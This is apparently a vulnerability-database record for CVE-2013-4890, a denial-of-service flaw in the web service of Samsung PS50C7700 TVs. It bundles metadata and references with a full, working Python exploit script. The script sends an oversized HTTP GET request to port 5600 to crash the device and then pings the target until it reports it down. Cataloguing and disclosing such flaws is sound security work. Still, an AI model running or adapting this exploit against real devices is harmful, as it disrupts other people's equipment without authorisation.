ID
VAR-E-201307-0008
CVE
cve_id: | CVE-2013-4890 | Trust: 2.4 |
EDB ID
27043
TITLE
Samsung PS50C7700 TV - Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Samsung PS50C7700 TV - Denial of Service. CVE-2013-4890CVE-95574 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | samsung | model: | ps50c7700 tv | scope: | - | version: | - | Trust: 1.6 |
vendor: | samsung | model: | tv | scope: | - | version: | - | Trust: 0.5 |
vendor: | samsung | model: | ps50c7700 plasma-tv | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
#!/usr/bin/python
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Date: 07/21/2013
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description: Resets some Samsung TVs
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
# Tested successfully on my Samsung PS50C7700 plasma TV :)
import httplib
import sys
import os
print " ***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description: Resets some Samsung TVs\n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print " ***************************************************************************************\n"
# Sends the payload
print " Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()
# Checks the response
print " Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print " Target down!\n"
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.6
TAGS
tag: | exploit | Trust: 0.5 |
tag: | web | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
CREDITS
Malik Mesellem
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2013-4890 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 27043 | Trust: 1.6 |
db: | EDBNET | id: | 48942 | Trust: 0.6 |
db: | PACKETSTORM | id: | 122502 | Trust: 0.5 |
db: | BID | id: | 61391 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2013-4890 | Trust: 2.1 |
url: | https://www.exploit-db.com/exploits/27043/ | Trust: 0.6 |
url: | http://www.samsung.com/nl/consumer/tv-audio-video/televisions/tv-archive/ps50c7000ywxxc | Trust: 0.3 |
url: | http://www.samsung.com/ | Trust: 0.3 |
url: | http://www.mmeit.be/exploits/samsungtv_reset.txt | Trust: 0.3 |
SOURCES
db: | BID | id: | 61391 |
db: | PACKETSTORM | id: | 122502 |
db: | EXPLOIT-DB | id: | 27043 |
db: | EDBNET | id: | 48942 |
LAST UPDATE DATE
2022-07-27T09:27:33.220000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 61391 | date: | 2013-07-21T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 61391 | date: | 2013-07-21T00:00:00 |
db: | PACKETSTORM | id: | 122502 | date: | 2013-07-22T19:32:32 |
db: | EXPLOIT-DB | id: | 27043 | date: | 2013-07-23T00:00:00 |
db: | EDBNET | id: | 48942 | date: | 2013-07-23T00:00:00 |